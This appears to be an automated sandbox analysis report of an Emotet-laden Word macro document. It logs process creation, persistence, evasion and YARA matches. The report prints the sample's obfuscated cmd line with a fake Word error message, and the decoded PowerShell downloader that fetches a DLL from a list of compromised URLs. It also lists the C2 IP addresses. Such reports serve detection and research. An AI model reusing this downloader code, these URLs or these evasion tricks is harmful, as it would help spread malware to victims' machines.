Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: mscorlib.pdb` source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdbO source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2107891055.0000000002820000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbles AA source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp

                      Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: ARCHIVOFile-20-012021.doc Stream path 'Macros/VBA/Nst6otvnmgmpw' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Nst6otvnmgmpw
Document contains an embedded VBA with many randomly named variables
Source: ARCHIVOFile-20-012021.doc Stream path 'Macros/VBA/Nst6otvnmgmpw' : High entropy of concatenated variable names
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002608D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002439A0 push cs; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242A01 push esi; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00245BD8 push ss; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00245C29 push ss; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024548F push ebp; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242CFB push ecx; retn 001Eh
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00241740 push DA0FDC41h; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001E08D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C39A0 push cs; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C2A01 push esi; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C5BD8 push ss; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C5C29 push ss; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C548F push ebp; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C2CFB push ecx; retn 001Eh
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C1740 push DA0FDC41h; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002408D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002239A0 push cs; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00222A01 push esi; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00225BD8 push ss; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00225C29 push ss; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0022548F push ebp; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00222CFB push ecx; retn 001Eh
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00221740 push DA0FDC41h; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002108D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F39A0 push cs; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F2A01 push esi; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F5BD8 push ss; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F5C29 push ss; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F548F push ebp; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F2CFB push ecx; retn 001Eh

                      Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: rundll32.exe, 00000008.00000002.2124359207.00000000006A0000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page execute read | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 51.255.203.164 144
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 84.232.229.24 80
                      Encrypted powershell cmdline option found
                      Source: unknownProcess created: Base64 decoded SET-iTeM varIaBLE:PGB ( [TYPe]("{2}{4}{5}{1}{0}{3}" -f'.Dir','m.IO','Sy','ECToRy','St','E')); sET ('29x'+'d'+'4M') ( [TYpE]("{7}{1}{2}{3}{6}{4}{0}{5}" -f'Na','ys','TeM.NEt','.SErVi','ePOinTmA','GeR','C','s') );$Xjb6uu9=$S_7W + [char](64) + $C96Z;$A29Y=(('T'+'65')+'Q'); $pgB::"cr`EaT`eDIr`Ect`oRy"($HOME + (('db'+('zVl'+'j0ta0d')+'bz'+('M'+'tkd4'+'y0')+('db'+'z'))."r`E`PLAce"(([cHaR]100+[cHaR]98+[cHaR]122),'\')));$X13H=(('T'+'66')+'L'); (VaRiABLe ('29x'+'d'+'4M') ).VALue::"SeCUR`ITY`P`R`OTOCOL" = ('Tl'+('s'+'12'));$E34Q=(('Q_'+'1')+'L');$I3laa23 = (('O8'+'_')+'N');$W96Y=(('P'+'51')+'D');$Iq6rfg0=$HOME+((('o'+'6nV')+('lj0t'+'a0o')+'6n'+'Mt'+('kd'+'4')+('y'+'0o6')+'n')-crEPlACE ([chAr]111+[chAr]54+[chAr]110),[chAr]92)+$I3laa23+('.'+('dl'+'l'));$S84B=('O'+('32'+'I'));$Ozx9xkd=('s'+'g'+(' yw'+' a'+'h'+':'+'//riandut')+('r'+'a.com/e')+'m'+'a'+('il/'+'A'+'fhE8z0/')+('@s'+'g yw')+(' a'+'h:')+'//'+'c'+('al'+'le'+'dtoch'+'a')+('nge'+'.org'+'/C')+'a'+('l'+'ledt')+'o'+'C'+'h'+('an'+'g')+('e/8huS'+'O'+'d/')+('@s'+'g yw')+(' ah'+'s:/'+'/m'+'rveggy.c'+'om/wp-admi'+'n')+('/'+'n/@')+'s'+('g yw'+' a')+'h'+'s'+(':'+'//n')+('orail'+'y')+'a'+('.'+'co'+'m/dr')+'up'+('al'+'/')+('r'+'etA')+'l'+('/'+'@sg')+' y'+('w ahs:'+'/')+'/'+('hbprivi'+'l'+'e'+'g')+'e'+'d.'+'co'+('m/cg'+'i-bin'+'/Qg')+('/@s'+'g y'+'w')+(' '+'ahs')+':'+'//'+'u'+'mm'+('ahstar'+'s.'+'com')+'/'+('ap'+'p_')+'o'+('ld_'+'m')+('ay_'+'2')+'0'+('18'+'/')+('as'+'sets')+('/'+'wDL8'+'x')+'/'+('@s'+'g ')+('y'+'w ')+('ah'+'s')+'
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SET-iTeM varIaBLE:PGB ( [TYPe]("{2}{4}{5}{1}{0}{3}" -f'.Dir','m.IO','Sy','ECToRy','St','E')); sET ('29x'+'d'+'4M') ( [TYpE]("{7}{1}{2}{3}{6}{4}{0}{5}" -f'Na','ys','TeM.NEt','.SErVi','ePOinTmA','GeR','C','s') );$Xjb6uu9=$S_7W + [char](64) + $C96Z;$A29Y=(('T'+'65')+'Q'); $pgB::"cr`EaT`eDIr`Ect`oRy"($HOME + (('db'+('zVl'+'j0ta0d')+'bz'+('M'+'tkd4'+'y0')+('db'+'z'))."r`E`PLAce"(([cHaR]100+[cHaR]98+[cHaR]122),'\')));$X13H=(('T'+'66')+'L'); (VaRiABLe ('29x'+'d'+'4M') ).VALue::"SeCUR`ITY`P`R`OTOCOL" = ('Tl'+('s'+'12'));$E34Q=(('Q_'+'1')+'L');$I3laa23 = (('O8'+'_')+'N');$W96Y=(('P'+'51')+'D');$Iq6rfg0=$HOME+((('o'+'6nV')+('lj0t'+'a0o')+'6n'+'Mt'+('kd'+'4')+('y'+'0o6')+'n')-crEPlACE ([chAr]111+[chAr]54+[chAr]110),[chAr]92)+$I3laa23+('.'+('dl'+'l'));$S84B=('O'+('32'+'I'));$Ozx9xkd=('s'+'g'+(' yw'+' a'+'h'+':'+'//riandut')+('r'+'a.com/e')+'m'+'a'+('il/'+'A'+'fhE8z0/')+('@s'+'g yw')+(' a'+'h:')+'//'+'c'+('al'+'le'+'dtoch'+'a')+('nge'+'.org'+'/C')+'a'+('l'+'ledt')+'o'+'C'+'h'+('an'+'g')+('e/8huS'+'O'+'d/')+('@s'+'g yw')+(' ah'+'s:/'+'/m'+'rveggy.c'+'om/wp-admi'+'n')+('/'+'n/@')+'s'+('g yw'+' a')+'h'+'s'+(':'+'//n')+('orail'+'y')+'a'+('.'+'co'+'m/dr')+'up'+('al'+'/')+('r'+'etA')+'l'+('/'+'@sg')+' y'+('w ahs:'+'/')+'/'+('hbprivi'+'l'+'e'+'g')+'e'+'d.'+'co'+('m/cg'+'i-bin'+'/Qg')+('/@s'+'g y'+'w')+(' '+'ahs')+':'+'//'+'u'+'mm'+('ahstar'+'s.'+'com')+'/'+('ap'+'p_')+'o'+('ld_'+'m')+('ay_'+'2')+'0'+('18'+'/')+('as'+'sets')+('/'+'wDL8'+'x')+'/'+('@s'+'g ')+('y'+'w ')+('ah'+'s')+'
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                      Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: Yara match File source: 00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.2127750584.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000D.00000002.2180397123.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000F.00000002.2197905867.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.2168489304.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000E.00000002.2188156936.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000012.00000002.2336963149.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000F.00000002.2198949244.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000002.2210754308.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000009.00000002.2133960367.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000002.2208025145.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.2124233296.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000009.00000002.2134645958.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000B.00000002.2157336224.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.2113528268.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.2113590423.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000009.00000002.2134026009.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000D.00000002.2177327005.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.2148272205.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000F.00000002.2197927518.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000B.00000002.2157365734.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.2124067211.0000000000140000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000002.2208036737.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000011.00000002.2217818929.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000B.00000002.2159945715.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.2170332868.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000D.00000002.2177340948.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000011.00000002.2217846238.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.2149995465.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000E.00000002.2188168029.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.2168457347.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
